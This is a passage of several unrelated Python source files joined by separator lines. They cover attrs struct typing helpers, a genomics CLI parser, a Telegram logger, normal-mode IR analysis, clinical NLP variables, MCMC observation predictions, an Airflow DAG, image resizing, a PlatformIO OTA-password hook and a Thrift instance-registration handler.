- type: the nested struct type (or class)
- tuple: ( type, REQUIRED, {dictionary of extra attr.ib arguments} )
:return a property initializer from attrs (attr.ib)
"""
class_, required_, *kwargs = (
arguments if isinstance(arguments, tuple) else (arguments, False)
)
def converter(args) -> List[class_]:
if isinstance(args, list):
items = args
else:
items = [args]
return [
(utils.instantiate(class_, item) if isinstance(item, dict) else item) for item in items
]
default_ = dict(default=attr.NOTHING if required_ else [])
return attr.ib(**{
**default_,
"converter": converter,
**dict(reduce(lambda r, d: r + list(d.items()), kwargs, []))
})
class _JDict:
"""A typing definition wrapper used to defined nested dictionary struct typing.
from jstruct import struct
from jstruct.type import _JDict
JDict = _JDict()
@struct
class Child:
child_prop1: int
@struct
class Parent:
parent_prop: str
children: Dict[str, Child] = JDict[str, Child]
"""
def __getitem__(self, arguments: Tuple[type, type, Optional[bool], Optional[dict]]):
"""Override the `[]` operator to offer a typing wrapper syntactic sugar.
:arguments is a `tuple`
( key_type, value_type, REQUIRED, {dictionary of extra attr.ib arguments} )
:return a property initializer from attrs (attr.ib)
"""
key_type, value_type, required_, *kwargs = (
            arguments + (False,) if len(arguments) < 3 else arguments  # default REQUIRED to False when omitted
)
def converter(args) -> Dict[key_type, value_type]:
return {
key_type(key): (
utils.instantiate(value_type, value)
if isinstance(value, dict) else value
)
for (key, value) in args.items()
}
default_ = dict(default=attr.NOTHING if required_ else {})
return attr.ib(**{
**default_,
"converter": converter,
**dict(reduce(lambda r, d: r + list(d.items()), kwargs, []))
})
# Instance of _JStruct
JStruct = _JStruct()
# Instance of _JList
JList = _JList()
# Instance of _JDict
JDict = _JDict()
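if __name__ == "__main__":
    # Illustrative usage sketch (not part of the original module), assuming
    # jstruct.utils.instantiate builds an instance of a @struct class from a
    # dict of attribute values.
    @struct
    class Child:
        child_prop1: int = 0

    @struct
    class Parent:
        parent_prop: str = ""
        child: Child = JStruct[Child]
        children: List[Child] = JList[Child]

    p = Parent(parent_prop="x", child={"child_prop1": 1},
               children=[{"child_prop1": 2}, {"child_prop1": 3}])
    print(p.child, p.children)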
|
def setup_parser(common_parser, subparsers):
parser = subparsers.add_parser("genotype", parents=[common_parser])
parser.add_argument(
"-i",
"--gram_dir",
help="Directory containing outputs from gramtools `build`",
dest="gram_dir",
type=str,
required=True,
)
parser.add_argument(
"-o",
"--genotype_dir",
help="Directory to hold this command's outputs.",
type=str,
dest="geno_dir",
required=True,
)
parser.add_argument(
"--reads",
help="One or more read files.\n"
"Valid formats: fastq, sam/bam/cram, fasta, txt; compressed or uncompressed; fuzzy extensions (eg fq, fsq for fastq).\n"
"Read files can be given after one or several '--reads' argument:"
"Eg '--reads rf_1.fq rf_2.fq.gz --reads rf_3.bam '",
nargs="+",
action="append",
type=str,
required=True,
)
parser.add_argument(
"--sample_id",
help="A name for your dataset.\n" "Appears in the genotyping outputs.",
required=True,
)
parser.add_argument(
"--ploidy",
help="The expected ploidy of the sample.\n" "Default: haploid",
choices=["haploid", "diploid"],
required=False,
default="haploid",
)
parser.add_argument(
"--max_threads",
help="Run with more threads than the default of one.",
type=int,
default=1,
required=False,
)
parser.add_argument(
"--seed",
help="Fixing the seed will produce the same read mappings across different runs."
"By default, seed is randomly generated so this is not the case.",
type=int,
default=0,
required=False,
)
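if __name__ == "__main__":
    # Illustrative wiring sketch (not part of the original file): how this hook
    # plugs into a top-level argparse CLI with a shared parent parser.
    import argparse
    common_parser = argparse.ArgumentParser(add_help=False)
    top_parser = argparse.ArgumentParser(prog="gramtools")
    subparsers = top_parser.add_subparsers(dest="command")
    setup_parser(common_parser, subparsers)
    args = top_parser.parse_args(
        ["genotype", "-i", "gram", "-o", "geno",
         "--reads", "reads_1.fq", "--sample_id", "sample1"]
    )
    print(args.gram_dir, args.geno_dir, args.reads)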
|
# -*- coding: utf-8 -*-
import datetime
import time
import os
import configparser
from PIL import Image
import telebot
PATH_TGCONFIG = 'tgsettings.ini'
#global tgconf
#global bot_result
#global tgbot
def newdir(tpath):
"""
    Create a directory.
    @param tpath: Directory name.
"""
try:
os.mkdir(tpath)
except OSError:
print("Директория %s уже существует" % tpath)
else:
print("Успешно создана директория %s " % tpath)
def write_txt(name_log, str = ""):
"""
    Write text to a log file.
    @param name_log: File name.
    @param str: Text string.
"""
with open(name_log, 'at', encoding='utf-8') as file:
        if str == "":
file.write("\n")
else:
file.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ") + str + "\n")
def log_write_txt(str = ""):
"""
    Write log entries to the configured log file.
    @param str: Text string.
"""
global tgconf
if (str != ""):
print(str)
write_txt(tgconf['log_file_name'], str)
def read_tgconfig(filename):
"""
    Read the configuration.
    @param filename: File name.
    @return: (dict) - The configuration.
"""
cfg = configparser.ConfigParser(allow_no_value=True)
cfg.read(filename, encoding='utf-8')
conf = {'log_dir': cfg.get('DEFAULT', 'log_dir'),
'log_file_name': cfg.get('DEFAULT', 'log_file_name'),
'tglog': cfg.getboolean('DEFAULT', 'tglog'),
'name_group': cfg.get('DEFAULT', 'name_group'),
'token': cfg.get('DEFAULT', 'token'),
'count_exeption': cfg.getint('DEFAULT', 'count_exeption'),
'sleep_exeption': cfg.getfloat('DEFAULT', 'sleep_exeption')}
return conf
def send_tgmessage(text="", res=True, tgres=True):
"""
    Send a message: to the screen, to the log, to Telegram.
    @param text: Text string.
    @param res: Accumulate text in a temporary variable for later sending. With the default
                res=True no accumulation happens and the text goes straight to the log.
    @param tgres: Accumulate text in a temporary variable for Telegram.
    @return: (bool) - Was the message sent successfully?
"""
global tgconf
global bot_result
global tgbot
if res:
log_write_txt(text.replace("\n", " "))
if tgres:
if bot_result != "":
text = bot_result + "\n" + text
if not res:
log_write_txt(text.replace("\n", " "))
bot_result = ""
if tgbot is not None:
for _ in range(tgconf['count_exeption']):
try:
tgbot.send_message(tgconf['name_group'], text)
except OSError:
time.sleep(tgconf['sleep_exeption'])
continue
else:
return True
log_write_txt("Error send_tgmessage")
return False
else:
if bot_result != "":
bot_result = bot_result + "\n" + text
else:
bot_result = text[:]
return True
def send_tgphoto(file_name):
"""
    Send a photo.
    @param file_name: Name of the file to send.
    @return: (bool) - Was the message sent successfully?
"""
global tgconf
global tgbot
log_write_txt("Photo: " + file_name)
if tgbot is not None:
for _ in range(tgconf['count_exeption']):
try:
tgbot.send_photo(tgconf['name_group'], open(file_name, 'rb'))
except OSError:
time.sleep(tgconf['sleep_exeption'])
continue
else:
return True
log_write_txt("Error send_tgphoto")
return False
return True
# Telegram
tgconf = read_tgconfig(PATH_TGCONFIG)
bot_result = ""
tgbot = telebot.TeleBot(tgconf['token']) if tgconf['tglog'] else None
if __name__ == "__main__":
newdir(tgconf['log_dir'])
    send_tgmessage("First message", tgres=False, res=True)
    send_tgmessage("Second message", tgres=True, res=True)
send_tgphoto('.\{:}\metrics_class.png'.format(tgconf['log_dir']))
|
# coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import numpy as np
import tamkin
from pyiron.atomistics.job.atomistic import Trajectory
from molmod.units import *
from molmod.constants import *
from molmod.periodic import periodic
import matplotlib.pyplot as pt
class NMA(tamkin.NMA):
"""
This is a generic module to do a Normal Mode Analysis on a job type,
which calculates the gradient and the hessian using TAMkin based on a job object.
With the NMA object you can animate a certain mode and plot the IR spectrum.
"""
def __init__(self,job, atomic_units=False):
self.job = job
if not job['output/generic/hessian'] is None and not job['output/generic/forces'] is None:
structure = job.get_structure(-1)
if atomic_units:
mol = tamkin.Molecule(structure.get_atomic_numbers(),structure.get_positions(),np.array(structure.get_masses())*amu,
job['output/generic/energy_tot'],job['output/generic/forces']*-1 ,job['output/generic/hessian'])
else:
mol = tamkin.Molecule(structure.get_atomic_numbers(),structure.get_positions()*angstrom,np.array(structure.get_masses())*amu,
job['output/generic/energy_tot']*electronvolt,job['output/generic/forces']*-1*electronvolt/angstrom ,job['output/generic/hessian']*electronvolt/angstrom**2)
else:
raise ValueError('An NMA calculation requires a gradient and hessian.')
super(NMA, self).__init__(mol)
def animate_nma_mode(self,index,amplitude=1.0,frames=24,spacefill=False,particle_size=0.5):
'''
Visualize the normal mode corresponding to an index
**Arguments**
index index corresponding to a normal mode
amplitude size of the deviation of the normal mode
frames number of frames that constitute the full mode (lower means faster movement)
spacefill remove atom bonds
        particle_size
size of the atoms in the structure
'''
print("This mode corresponds to a frequency of {} 1/cm".format(self.freqs[index]/lightspeed/(1./centimeter)))
coordinates = self.coordinates
symbols = [periodic[n].symbol for n in self.numbers]
mode = self.modes[:,index]
if self.masses3 is not None:
mode /= np.sqrt(self.masses3)
mode /= np.linalg.norm(mode)
positions = np.zeros((frames,len(symbols),3))
for frame in range(frames):
factor = amplitude*np.sin(2*np.pi*float(frame)/frames)
positions[frame] = (coordinates + factor*mode.reshape((-1,3)))/angstrom
try:
import nglview
except ImportError:
raise ImportError("The animate_nma_mode() function requires the package nglview to be installed")
animation = nglview.show_asetraj(Trajectory(positions,self.job.structure))
if spacefill:
animation.add_spacefill(radius_type='vdw', scale=0.5, radius=particle_size)
animation.remove_ball_and_stick()
else:
animation.add_ball_and_stick()
return animation
def plot_IR_spectrum(self,width=10*lightspeed/centimeter,scale=1.0,intensities=None,charges=None):
"""
Plot IR spectrum based on Lorentzian width, freqs can be scaled through scale
Intensities can be provided (e.g. from a Gaussian job) or calculated from the charges
**Arguments**
width width of the Lorentzian function
scale scales the frequencies with this factor
intensities
IR intensities for spectrum, can be read from Gaussian job
charges charges to calculate IR intensities, from e.g. Yaff simulation
"""
if not intensities is None:
assert len(intensities) == (len(self.freqs)-len(self.zeros))
if intensities is None and charges is None:
raise ValueError('This function requires the charges or the intensities to calculate the line shape')
elif not intensities is None and not charges is None:
raise ValueError('Please only provide either the intensities or the charges')
else:
xr = np.arange(0,5001,1)*lightspeed/centimeter
alphas = np.zeros(len(xr))
# Calculate intensities
amps = self.modes
freqs = self.freqs * scale
for n, (wn, ampn) in enumerate(zip(np.delete(freqs,self.zeros),np.delete(amps,self.zeros,axis=0))): #self.zeros contain the indices of the zero frequencies
if not charges is None:
intensity = 0.0
for k in range(3):
for i, qi in enumerate(charges):
idx = 3*i+k
intensity += (qi*ampn[idx])**2
else:
intensity = intensities[n]
alphas += intensity*self._lorentz(xr,wn,width)
print('Mode %i: freq = %.3f 1/cm IR ampl. = %.3e a.u.' %(n, wn/(lightspeed/centimeter), intensity))
pt.clf()
pt.plot(xr/(lightspeed/centimeter),alphas)
pt.xlabel('Frequency [1/cm]')
pt.ylabel('Absorption [a.u.]')
pt.show()
@staticmethod
def _lorentz(x,p,w):
"""
Lorentzian line shape function, p is position of max, w is FWHM and x is current frequency
"""
return 1./(1.+((p-x)/(w/2.))**2)
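# Illustrative usage sketch (not part of the original module), assuming `job` is
# a finished pyiron job whose output provides forces and a hessian:
#
#   nma = NMA(job)
#   view = nma.animate_nma_mode(6, amplitude=2.0)  # returns an nglview widget
#   nma.plot_IR_spectrum(charges=charges)          # or intensities=... from a Gaussian job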
|
import pathlib
import datetime
from loguru import logger
try:
import runrex.post.variable_builder as vb
except ImportError as ie:
logger.error('Need to install pandas: `pip install pandas`.')
raise ie
VARIABLES = {
'panc_with_competing_dx': ('+pancreatitis', '+competing_dx', '-competing_dx_NEGATIVE'),
'panc_without_competing_dx': ('+pancreatitis', '=competing_dx_NEGATIVE'),
'panc_with_pain': ('+pancreatitis', '+pain'),
'panc_with_radiating_to_back_pain': ('+pancreatitis', '+pain_RADIATING_TO_BACK'),
'panc_with_abdominal_pain': ('+pancreatitis', '+pain_ABD_PAIN'),
'acute_panc_without_competing_dx': ('+pancreatitis_ACUTE', '=competing_dx_NEGATIVE'),
'acute_panc_with_competing_dx': ('+pancreatitis', '+competing_dx', '-competing_dx_NEGATIVE'),
'panc_with_sudden_onset_pain': ('+pancreatitis', '+pain_SUDDEN_ONSET'),
'acute_panc_with_sudden_onset_pain': ('+pancreatitis_ACUTE', '+pain_SUDDEN_ONSET'),
'acute_panc_imaging': ('+pancreatitis_ACUTE', '+is_radiology'),
'panc_imaging': ('+pancreatitis', '+is_radiology'),
'panc_with_nausea': ('+pancreatitis', '+nausea'),
'panc_with_necrosis': ('+pancreatitis', '+necrosis'),
'panc_with_fluid': ('+pancreatitis', '+fluid'),
'panc_with_pseudocyst': ('+pancreatitis', '+pseudocyst'),
'panc_with_recency': ('+pancreatitis', '+pain_RECENT'),
'acute_panc_consistent': ('+pancreatitis_ACUTE', '+is_radiology'),
'panc_consistent': ('+pancreatitis', '+is_radiology'),
'necrosis_in_imaging': ('+is_radiology', '+necrosis'),
'fluid_in_imaging': ('+is_radiology', '+fluid'),
'pseudocyst_in_imaging': ('+is_radiology', '+pseudocyst'),
}
def build_variables(file, metafile):
res = vb.build_variables(file, metafile, extra_condition='is_radiology', **VARIABLES)
outdir = file.parent
res.to_csv(
outdir / f'ap_final_variables_{datetime.datetime.now().strftime("%Y%m%d")}.csv',
index=False
)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(fromfile_prefix_chars='@!')
parser.add_argument('-i', '--file', required=True, type=pathlib.Path,
help='Fullpath to file output CSV from `extract_and_load_json`.')
parser.add_argument('-m', '--metafile', required=True, type=pathlib.Path,
help='Fullpath to CSV file containing metadata. Must at least contain:'
' doc_id, patient_id, total_text_length, date. May also contain'
' other variables as well.')
args = parser.parse_args()
build_variables(args.file, args.metafile)
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import corner
import numpy as np
import pandas as pd
import emcee
import sys
import mm_likelihood
from astropy.time import Time
import commentjson as json
import mm_param
import mm_make_geo_pos
from tqdm import tqdm
import functools
class ReadJson(object):
def __init__(self, filename):
print('Read the runprops.txt file')
self.data = json.load(open(filename))
def outProps(self):
return self.data
#chain = (nwalkers, nlink, ndim)
def sample_deltas(i, draws, names, fixed_df, total_df_names, fit_scale, names_dict, runprops, nobj, fakeobsdf, geo_obj_pos, dlong, dlat):
paramdf = mm_param.from_fit_array_to_param_df(draws[i,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0]
drawparams = paramdf.iloc[:,:-nobj].values
DeltaLong_Model, DeltaLat_Model, fakeobsdf = mm_likelihood.mm_chisquare(paramdf, fakeobsdf, runprops, geo_obj_pos, gensynth = True)
length = len(DeltaLong_Model)
dlong = np.zeros((runprops.get('numobjects')-1, length))
dlat = np.zeros((runprops.get('numobjects')-1, length))
for j in range(1,runprops.get('numobjects')):
dlong[j-1,:] = DeltaLong_Model[j-1]
dlat[j-1,:] = DeltaLat_Model[j-1]
return dlong, dlat, drawparams
def predictions(sampler, fit_scale, float_names, obsdf, runprops, geo_obj_pos, fixed_df, total_df_names, pool):
numdraws = 1000
# Getting log likelihood posterior values and flatchain for use throughout
burnin = int(runprops.get('nburnin'))
clusterburn = int(runprops.get('clustering_burnin'))
thin_plots = int(runprops.get('nthinning'))
flatchain = sampler.get_chain(discard=int(burnin/thin_plots+clusterburn/thin_plots),flat = True, thin=thin_plots)
print(flatchain.shape, 'shape')
llhoods = sampler.get_log_prob(discard=int(burnin/thin_plots+clusterburn/thin_plots),flat = True, thin=thin_plots)
#ind = np.argmax(llhoods)
#params = flatchain[ind,:].flatten()
# Getting parameter names
names = []
for i in float_names:
names.append(i)
names_dict = runprops.get("names_dict")
# Choose random draws from the flatchain
drawsindex = np.random.randint(flatchain.shape[0], size = numdraws)
draws = flatchain[drawsindex,:]
llhoods = llhoods[drawsindex]
# Get time arrays
converttimes = ["2023-10-01","2024-09-30"]
t = Time(converttimes)
timesdic = {'start': t.isot[0], 'stop': t.isot[1], 'step': '6h'}
# Make a geocentric position file
geo_obj_pos = mm_make_geo_pos.mm_make_geo_pos(objname, timesdic, runprops, True)
    # Creating a fake observations data frame
times = geo_obj_pos.values[:,0].flatten()
fakeobsdf = obsdf.loc[[0,1],:]
for i in range(len(times)):
if i == 0 or i == 1:
fakeobsdf.iloc[i,0] = times[i]
fakeobsdf = fakeobsdf.append(fakeobsdf.iloc[-1,:])
fakeobsdf['time'].iloc[-1] = times[i]
fakeobsdf = fakeobsdf.iloc[2:]
# Creating arrays to hold outputs
dlong = np.zeros((draws.shape[0], runprops.get('numobjects')-1, times.size))
dlat = np.zeros((draws.shape[0], runprops.get('numobjects')-1, times.size))
# Holding paramvalues
nobj = runprops.get('numobjects')
print(mm_param.from_fit_array_to_param_df(draws[0,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0])
ndims = mm_param.from_fit_array_to_param_df(draws[0,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0].iloc[:,:-nobj].size
print(ndims)
paramnames = mm_param.from_fit_array_to_param_df(draws[0,:].flatten(), names, fixed_df, total_df_names, fit_scale, names_dict, runprops)[0].columns.tolist()[0:-nobj]
print(paramnames)
drawparams = np.zeros((ndims, numdraws))
deltas = functools.partial(sample_deltas, draws=draws, names=names, fixed_df=fixed_df, total_df_names=total_df_names, fit_scale=fit_scale, names_dict=names_dict, runprops=runprops, nobj=nobj, fakeobsdf=fakeobsdf, geo_obj_pos=geo_obj_pos, dlong=dlong, dlat=dlat)
x = tqdm(range(draws.shape[0]))
data = pool.map(deltas, x)
length = len(data)
dlong = np.zeros((draws.shape[0],2,length))
dlat = np.zeros((draws.shape[0],2,length))
for i in range(len(data)):
dlong[i] = data[i][0]
dlat[i] = data[i][1]
drawparams[:,i] = data[i][2]
# Now collapse the arrays with a std call
dlongstd = np.std(dlong,axis = 0)
dlatstd = np.std(dlat,axis = 0)
dlongmean = np.mean(dlong,axis = 0)
dlatmean = np.mean(dlat,axis = 0)
print(dlongstd.shape)
print(dlatstd.shape)
totaldf = pd.DataFrame(drawparams.T, columns = paramnames)
#print(totaldf)
# Calculate average (mean for now) error in the real data
name_dict = runprops.get("names_dict")
objectnames = []
for i in name_dict.values():
objectnames.append(i)
typicalerror = np.zeros((2,runprops.get('numobjects')-1))
for i in range(1,runprops.get('numobjects')):
typicalerror[0,i-1] = np.median(obsdf["DeltaLong_" + objectnames[i] + "_err"].values.flatten())
typicalerror[1,i-1] = np.median(obsdf["DeltaLat_" + objectnames[i] + "_err"].values.flatten())
# Now create info gain arrays
infogain = np.zeros((runprops.get('numobjects')-1, times.size))
infogain2 = np.zeros((runprops.get('numobjects')-1, times.size))
g_gain = np.zeros((runprops.get('numobjects')-1,2))
g_gains_ind = np.zeros((runprops.get('numobjects')-1,10))
for i in range(1,runprops.get('numobjects')):
infogain[i-1,:] = np.sqrt( (dlongstd[i-1,:]/typicalerror[0,i-1])**2 + (dlatstd[i-1,:]/typicalerror[1,i-1])**2 )
g_gain[i-1,0] = times[np.argmax(infogain[i-1,:])]
g_gain[i-1,1] = np.argmax(infogain[i-1,:])
g_gains_ind[i-1,:] = (-infogain[i-1,:]).argsort()[:10]
colorcycle = ['#377eb8', '#ff7f00', '#4daf4a', '#f781bf', '#a65628', '#984ea3','#999999', '#e41a1c', '#dede00']
fig = plt.figure(figsize = (12.8,4.8))
t = Time(times, format = "jd")
mat_times = matplotlib.dates.datestr2num(t.iso, default=None)
for i in range(1,runprops.get('numobjects')):
plt.plot_date(mat_times, infogain[i-1,:].flatten(), "-", color = colorcycle[i-1], label = objectnames[i], alpha = 0.5)
plt.title("Dates of greatest gain: JD "+str(g_gain[:,0]))
plt.xlabel("Time")
plt.ylabel("Info gained")
plt.legend()
plt.savefig("predictions.pdf", format = "pdf")
plt.close()
print('dlatmean',dlatmean)
inds = g_gains_ind[0].astype(int)
print('dlatmean',dlatmean[0,inds])
gains = pd.DataFrame(columns=['times','dates','Hercules_Delta_Lat','Hercules_Delta_Long','Hercules_angle_tot','Dysnomia_Delta_Lat','Dysnomia_Delta_Long','Dysnomia_angle_tot','infogain_val'])
gains['times'] = times[inds]
gains['dates'] = t.iso[inds]
# DS TODO: remove eris specific code
gains['Hercules_Delta_Lat'] = dlatmean[0,inds]
gains['Hercules_Delta_Long'] = dlongmean[0,inds]
gains['Hercules_angle_tot'] = np.sqrt(dlatmean[0,inds]**2+dlongmean[0,inds]**2)
gains['Dysnomia_Delta_Lat'] = dlatmean[1,inds]
gains['Dysnomia_Delta_Long'] = dlongmean[1,inds]
gains['Dysnomia_angle_tot'] = np.sqrt(dlatmean[1,inds]**2+dlongmean[1,inds]**2)
gains['infogain_val'] = infogain[1,inds]
print(gains)
gains.to_csv('predictions_df.csv')
# Plot dlong vs dlat with color for j2
from matplotlib.backends.backend_pdf import PdfPages
predictionspdf = PdfPages("predictions_params.pdf")
print("Making predictions params")
for i in range(len(paramnames)):
plt.figure()
plt.axis("equal")
plt.scatter(0,0, color = "black")
plt.scatter(dlong[:,0,int(g_gain[1,1])], dlat[:,0,int(g_gain[1,1])], c = totaldf[paramnames[i]], edgecolor = None, alpha = 0.5, s = 10, cmap = "coolwarm")
plt.errorbar(np.median(dlong[:,0,int(g_gain[1,1])]), np.median(dlat[:,0,int(g_gain[1,1])]), xerr = typicalerror[0,0], yerr = typicalerror[1,0], ecolor = "red")
plt.scatter(dlong[:,1,int(g_gain[1,1])], dlat[:,1,int(g_gain[1,1])], c = totaldf[paramnames[i]], edgecolor = None, alpha = 0.5, s = 10, cmap = "coolwarm",marker='D')
plt.errorbar(np.median(dlong[:,1,int(g_gain[1,1])]), np.median(dlat[:,1,int(g_gain[1,1])]), xerr = typicalerror[0,1], yerr = typicalerror[1,1], ecolor = "red")
plt.xlabel("dLon")
plt.ylabel("dLat")
plt.title(paramnames[i])
color_bar = plt.colorbar()
color_bar.set_alpha(1)
color_bar.draw_all()
color_bar.set_label(paramnames[i])
predictionspdf.savefig()
predictionspdf.close()
pospdf = PdfPages("posterior_prediction.pdf")
plt.figure()
plt.axis("equal")
plt.scatter(0,0, color = "black")
plt.scatter(dlong[:,0,int(g_gain[1,1])], dlat[:,0,int(g_gain[1,1])], c=llhoods, cmap = "coolwarm")
plt.errorbar(np.median(dlong[:,0,int(g_gain[1,1])]), np.median(dlat[:,0,int(g_gain[1,1])]), xerr = typicalerror[0,0], yerr = typicalerror[1,0], ecolor = "red")
plt.scatter(dlong[:,1,int(g_gain[1,1])], dlat[:,1,int(g_gain[1,1])], c=llhoods, cmap = "coolwarm",marker="D")
plt.errorbar(np.median(dlong[:,1,int(g_gain[1,1])]), np.median(dlat[:,1,int(g_gain[1,1])]), xerr = typicalerror[0,1], yerr = typicalerror[1,1], ecolor = "red")
plt.xlabel("dLon")
plt.ylabel("dLat")
plt.title("JD: "+str(g_gain[1,0]))
color_bar = plt.colorbar()
color_bar.set_alpha(1)
color_bar.draw_all()
color_bar.set_label('Log-Likelihood')
pospdf.savefig()
pospdf.close()
#Actually build the plots here
#====================================================================================================
import glob, os
if __name__ == '__main__':
from schwimmbad import MPIPool
with MPIPool() as pool:
if not pool.is_master():
pool.wait()
sys.exit(0)
if 'results' in os.getcwd():
getData = ReadJson('runprops.txt')
else:
getData = ReadJson('most_recent_runprops.txt')
runprops = getData.outProps()
objname = runprops.get("objectname")
if not 'results' in os.getcwd():
os.chdir('../../../results/'+objname+'/')
results = max(glob.glob(os.path.join(os.getcwd(), '*/')), key=os.path.getmtime)
os.chdir(results)
backend = emcee.backends.HDFBackend('chain.h5')
fit_scale = pd.read_csv('fit_scale.csv',index_col=0)
float_names = runprops.get('float_names')
obsdf = pd.read_csv(objname+'_obs_df.csv',index_col=0)
geo_obj_pos = pd.read_csv('geocentric_'+objname+'_position.csv',index_col=0)
fixed_df = pd.read_csv('fixed_df.csv',index_col=0)
total_df_names = runprops.get('total_df_names')
predictions(backend, fit_scale, float_names, obsdf, runprops, geo_obj_pos, fixed_df, total_df_names, pool)
|
#!/usr/bin/env python
# -*-coding:utf-8-*-
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime, timedelta
START_DT = datetime(2018,5,23,0)
default_args = {
'owner': 'cdwanze',
'depends_on_past': False,
'start_date': START_DT,
'retries': 1,
'retry_delay': timedelta(minutes=5),
}
dag = DAG('run_bash_script_example', default_args=default_args, schedule_interval='@weekly')
task_backup = BashOperator(
task_id = 'run_bash_script_example',
    bash_command = 'test.sh ',  # trailing space so Airflow does not treat the .sh path as a Jinja template file
dag = dag
)
|
import os
import unittest
from test import support
from test.support import import_helper
# skip tests if _ctypes was not built
ctypes = import_helper.import_module('ctypes')
ctypes_symbols = dir(ctypes)
def need_symbol(name):
return unittest.skipUnless(name in ctypes_symbols,
'{!r} is required'.format(name))
def load_tests(*args):
return support.load_package_tests(os.path.dirname(__file__), *args)
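# Illustrative usage sketch (not part of the original file): gate a test case on
# a ctypes symbol being available.
#
#   @need_symbol('c_wchar')
#   class WCharTests(unittest.TestCase):
#       ...  # runs only when ctypes exposes c_wchar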
|
from zquantum.core.graph import (
generate_random_graph_erdos_renyi as _generate_random_graph_erdos_renyi,
generate_random_regular_graph as _generate_random_regular_graph,
generate_graph_from_specs as _generate_graph_from_specs,
save_graph,
)
import json
from typing import Union, Dict, Optional
def generate_random_graph_erdos_renyi(
number_of_nodes: int,
edge_probability: float,
random_weights: bool = False,
seed: Optional[int] = None,
):
graph = _generate_random_graph_erdos_renyi(
number_of_nodes, edge_probability, random_weights, seed
)
save_graph(graph, "graph.json")
def generate_random_regular_graph(
number_of_nodes: int,
degree: int,
random_weights: bool = False,
seed: Optional[int] = None,
):
graph = _generate_random_regular_graph(
number_of_nodes, degree, random_weights, seed
)
save_graph(graph, "graph.json")
def generate_complete_graph(
number_of_nodes: int, random_weights: bool = False, seed: Optional[int] = None
):
graph = _generate_random_graph_erdos_renyi(
number_of_nodes, 1.0, random_weights, seed
)
save_graph(graph, "graph.json")
def generate_graph_from_specs(graph_specs: Dict):
graph_specs_dict = json.loads(graph_specs)
graph = _generate_graph_from_specs(graph_specs_dict)
save_graph(graph, "graph.json")
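if __name__ == "__main__":
    # Illustrative usage sketch (not part of the original file): build a 10-node
    # Erdos-Renyi graph with edge probability 0.5 and write it to graph.json.
    generate_random_graph_erdos_renyi(10, 0.5, random_weights=True, seed=42)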
|
from PIL import Image
from sys import argv
if len(argv) != 4:
exit("usage: python resize.py n infile outfile")
n = int(argv[1])
infile = argv[2]
outfile = argv[3]
inimage = Image.open(infile)
width, height = inimage.size
outimage = inimage.resize((width * n, height * n))
outimage.save(outfile)
# To resize small images
# python resize.py n image.extension out.originalImageExtension
# n = the resize multiplier
|
#!/usr/bin/python
Import("env")
import os
def main():
input = "otapass.txt"
if not os.path.exists(input) or not os.path.isfile(input):
print(f"Error: {input} does not exist.")
env.Exit(1)
password = ""
with open(input) as f:
password = f.readline()
password = password.strip('\00')
env.Append(UPLOADERFLAGS=["-a", password])
main()
|
import time
import sys
import json
import threading
import wieraCommon
from pprint import pprint
from LocalInstanceToWieraIface import *
from LocalInstanceToWieraIface.ttypes import *
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
from WieraToLocalInstanceIface import *
from WieraToLocalInstanceIface.ttypes import *
class LocalInstanceToWieraHandler:
    def __init__(self, policy, local_instance_manager):
self.policy = policy
self.local_instance_manager = local_instance_manager
self.lock = threading.Lock()
def updateMonitoringData(self, monitoring_info):
json_data = json.loads(monitoring_info)
result = self.local_instance_manager.update_monitoring_info(json_data)
return json.dumps(result)
def requestNewDataPlacementPolicy(self, request):
try:
self.lock.acquire()
json_request = json.loads(request)
result = self.policy.re_evaluate_data_placement(json_request)
finally:
self.lock.release()
return json.dumps(result)
def _send_peers_info(self, peer_info):
#empty query for first dataplacement.
bDataPlacement = False
if bDataPlacement == True and 'trips' in self.policy.policy_spec:
# monitoring_info = self.local_instance_manager.get_monitoring_info(['ebs-st1', 'ebs-gp2', 's3', 'standard-disk', 'premium-p10'])
monitoring_info = self.local_instance_manager.get_monitoring_info(['ebs-st1', 'ebs-gp2', 's3'])
            # pprint(monitoring_info)
dummy_query = {}
dummy_query['access_info'] = {}
dummy_query['object_size'] = 8192
for hostname in self.local_instance_manager.instance_list:
dummy_query['access_info'][hostname] = {}
dummy_query['access_info'][hostname]['get_access_cnt'] = 1000000
dummy_query['access_info'][hostname]['put_access_cnt'] = 1000000
data_placement = self.policy.evaluate_data_placement(dummy_query, monitoring_info)
thread_list = []
for instance in self.local_instance_manager.instance_list:
client = self.local_instance_manager.get_local_instance_client(instance)
thread = wieraCommon.parallel_exec(client.dataPlacementChange, [json.dumps(data_placement),])
thread_list.append(thread)
wieraCommon.join_threads(thread_list)
thread_list = []
for instance in self.local_instance_manager.instance_list:
client = self.local_instance_manager.get_local_instance_client(instance)
thread = wieraCommon.parallel_exec(client.peersInfo, [json.dumps(peer_info),])
thread_list.append(thread)
wieraCommon.join_threads(thread_list)
def registerLocalInstance(self, instance_info, instance_ip):
# print 'registerTier' + str(instance_info)
instance_info = json.loads(instance_info)
try:
self.lock.acquire()
# print 'lock acquired'
result = {}
if instance_info != None:
hostname = instance_info['hostname']
if 'ip' not in instance_info:
                    ip = instance_ip.replace('::ffff:', '')  # drop the IPv4-mapped IPv6 prefix (strip() removes characters, not a prefix)
print ip + ' from callback_ip from thrift'
else:
ip = instance_info['ip']
stored_server_ip = self.local_instance_manager.policy.find_ip_by_hostname(hostname)
if stored_server_ip == None:
reason = 'Connection from ' + hostname + ':' + ip + ' is not in the expected location of Local server thus rejected.'
print reason
result['result'] = False
result['value'] = reason
elif ip != stored_server_ip:
reason = 'Hostname "' + hostname + '" is duplicated. ip: ' + ip + ' ip: ' + stored_server_ip
print reason
result['result'] = False
result['value'] = reason
else:
ports = instance_info['value']
application_port = ports['application_port']
print ports
if 'peer_port' in ports:
peer_port = ports['peer_port']
else:
peer_port = 0
instance_port = ports['instance_port']
self.local_instance_manager.add_local_instance(hostname, ip, application_port, peer_port, instance_port)
#check all instance are connected
